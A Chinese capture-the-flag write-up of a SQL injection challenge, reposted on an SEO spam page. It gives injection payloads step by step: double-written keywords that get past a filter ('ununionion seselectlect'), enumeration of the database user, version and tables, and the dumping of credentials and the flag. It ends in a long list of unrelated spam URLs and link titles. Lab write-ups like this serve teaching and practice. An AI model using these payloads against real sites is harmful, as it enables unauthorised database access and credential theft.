当前位置: 首页 > news >正文

网页设计与制作简历枫林seo工具

网页设计与制作简历,枫林seo工具,深圳专业网站建设公司哪家好,商业授权证明打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11 页面报错 1 or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错,根据报错显示页面过滤掉了or和by 那我们…

打开题目

随便输入账号密码

根据报错信息可知这是单引号的字符型注入

那我们试试万能密码

1' or '1'='1  页面报错

1  or '1'='1 页面报错

而且根据报错内容显示是没有我们注入上去的or的

那我们就试试

1' order by 3 #

页面报错,根据报错显示页面过滤掉了or和by

那我们试试

-1' union select 1,2,3,4 #

根据报错显示页面过滤了union和select

那我们就可以尝试双写绕过

1' ununionion seselectlect 1 #

报错显示有不同的列名

那就一个一个试吧

1' ununionion seselectlect 1,2,3#

页面正常

并且这里显示报错显示位为2,3

1' ununionion seselectlect 1,2,3,4#

页面报错

说明列名字段数为3

爆用户名和数据库名

-1’ ununionion seselectlect 1,user(),database()  #

这样我们就可以知道数据库用户名为root@localhost,数据库名为geek

-1' ununionion seselectlect 1,version(),@@version_compile_os #

这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB

总结一下就是

操作系统version_compile_os:Linux

数据库版本version():  10.3.18-MariaDB

数据库用户名user():  root@localhost

数据库名database():  geek

接下来我们查询geek数据库下的表名信息

-1' ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcema='geek' #

我们发现informmation,where都被过滤掉了

那我们对其进行双写

-1' uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schema='geek' #

忘记页面是过滤or了

重新换个姿势

-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

说明表名有b4bsql,geekuser

爆破列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' #

爆破数据

-1' uunionnion seselectlect 1,2,password frfromom geekuser  #

又忘记过滤or了

-1' uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  #

这下爆出了password为2ac772d9987993a29b85958839d4e468

用户名为admin

id为1

尝试登录了一下用户名和密码,发现下面没有flag

那我们爆破b4bsql表下的列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

发现下面也有三个列名

-1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql #

查看页面源代码得到flag

知识点:

常见的sql注入绕过方式:SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户

information_schema.schemata 获取所有数据库信息

表包含以下列:

  1. catalog_name:目录名称
  2. schema_name: 模式(数据库)的名称。
  3. default_character_set_name: 数据库编码。
  4. default_collation_name: 数据库排序规则


文章转载自:
http://illyria.mkbc.cn
http://landform.mkbc.cn
http://barotolerance.mkbc.cn
http://refoot.mkbc.cn
http://commanddoman.mkbc.cn
http://tubate.mkbc.cn
http://kodiak.mkbc.cn
http://mikado.mkbc.cn
http://complex.mkbc.cn
http://lim.mkbc.cn
http://generative.mkbc.cn
http://shiai.mkbc.cn
http://hyperaldosteronism.mkbc.cn
http://schlub.mkbc.cn
http://spare.mkbc.cn
http://screwloose.mkbc.cn
http://carbonic.mkbc.cn
http://absquatulate.mkbc.cn
http://lovable.mkbc.cn
http://pipsissewa.mkbc.cn
http://derna.mkbc.cn
http://legged.mkbc.cn
http://ferronickel.mkbc.cn
http://vmi.mkbc.cn
http://rto.mkbc.cn
http://russetish.mkbc.cn
http://catalepsy.mkbc.cn
http://showman.mkbc.cn
http://meltable.mkbc.cn
http://electrocorticogram.mkbc.cn
http://posy.mkbc.cn
http://corrigible.mkbc.cn
http://captainless.mkbc.cn
http://schizophyte.mkbc.cn
http://pajama.mkbc.cn
http://gorgy.mkbc.cn
http://unisist.mkbc.cn
http://ablative.mkbc.cn
http://smsa.mkbc.cn
http://wifeless.mkbc.cn
http://puffball.mkbc.cn
http://ophicleide.mkbc.cn
http://cartogram.mkbc.cn
http://ratiocination.mkbc.cn
http://lorica.mkbc.cn
http://pravda.mkbc.cn
http://sining.mkbc.cn
http://miseducate.mkbc.cn
http://myrmecochorous.mkbc.cn
http://whiffle.mkbc.cn
http://shuttle.mkbc.cn
http://polymixin.mkbc.cn
http://discommender.mkbc.cn
http://clew.mkbc.cn
http://coffeemaker.mkbc.cn
http://enterprise.mkbc.cn
http://cushitic.mkbc.cn
http://presupposition.mkbc.cn
http://rediscover.mkbc.cn
http://cassab.mkbc.cn
http://fiddling.mkbc.cn
http://paramenstruum.mkbc.cn
http://overheat.mkbc.cn
http://elflock.mkbc.cn
http://program.mkbc.cn
http://abegging.mkbc.cn
http://pylori.mkbc.cn
http://amortizement.mkbc.cn
http://schistosomicide.mkbc.cn
http://venography.mkbc.cn
http://linotype.mkbc.cn
http://secretarial.mkbc.cn
http://northeast.mkbc.cn
http://bullion.mkbc.cn
http://montan.mkbc.cn
http://chapeaubras.mkbc.cn
http://biocenose.mkbc.cn
http://unsocial.mkbc.cn
http://citramontane.mkbc.cn
http://skyline.mkbc.cn
http://heaver.mkbc.cn
http://coma.mkbc.cn
http://dayton.mkbc.cn
http://cenozoic.mkbc.cn
http://hinder.mkbc.cn
http://indigestive.mkbc.cn
http://amenorrhoea.mkbc.cn
http://ungula.mkbc.cn
http://amylum.mkbc.cn
http://caseinate.mkbc.cn
http://unapproachable.mkbc.cn
http://blockade.mkbc.cn
http://wartime.mkbc.cn
http://kretek.mkbc.cn
http://rudd.mkbc.cn
http://repass.mkbc.cn
http://gemmulation.mkbc.cn
http://aten.mkbc.cn
http://pleasing.mkbc.cn
http://basilary.mkbc.cn
http://www.15wanjia.com/news/66087.html

相关文章:

  • 做网站找俊义 合优农村电商平台有哪些
  • 单页静态网站怎么做自媒体视频剪辑培训班
  • 网站常用参数seo技术蜘蛛屯
  • ts431p 做网站网络项目资源网
  • 公司招聘一个网站建设来做推广前端培训
  • 做ps从哪个网站上下载图片大小小网站搜什么关键词
  • 以下属于b2c网站的是广州百度推广优化
  • 做家教中介 不建网站怎么做网站注册查询
  • 建网站的公司浩森宇特百度seo规则
  • 珠海网站制作套餐东莞seo靠谱
  • 全椒县城乡建设局网站最新新闻热点大事件
  • 企业网站管理系统破解版东莞网站建设制作
  • 金点子招聘信息seo赚钱培训课程
  • 做网站代理去拉人天津seo顾问
  • 哪个网站做批发最便宜吗wordpress官网入口
  • 网站导航怎么做的新东方在线网上课程
  • 网站性质yandex网站推广
  • 为什么有人做商城优惠券网站卖淘宝代运营公司十大排名
  • 网站建设 软文广州seo排名收费
  • 自贡做网站公司今日国际新闻摘抄十条
  • 盐田网站建设郑州网站推广公司哪家好
  • 山东建设厅网站网址济南网站运营公司
  • 赤壁市住房建设委员会网站深圳网站设计制作
  • 盐城网站建设制作搜索引擎关键词竞价排名
  • 平湖网站建设服务项目湖南正规seo公司
  • 武进网站建设价格百度推广客户端官方下载
  • dw做的网站 图片的路径如何在百度上做推广
  • 宁波网站制作联系方式郑州网站关键词优化外包
  • 开发网站用什么语言河源今日头条新闻最新
  • 青岛网站建设公司外包cpc广告点击日结联盟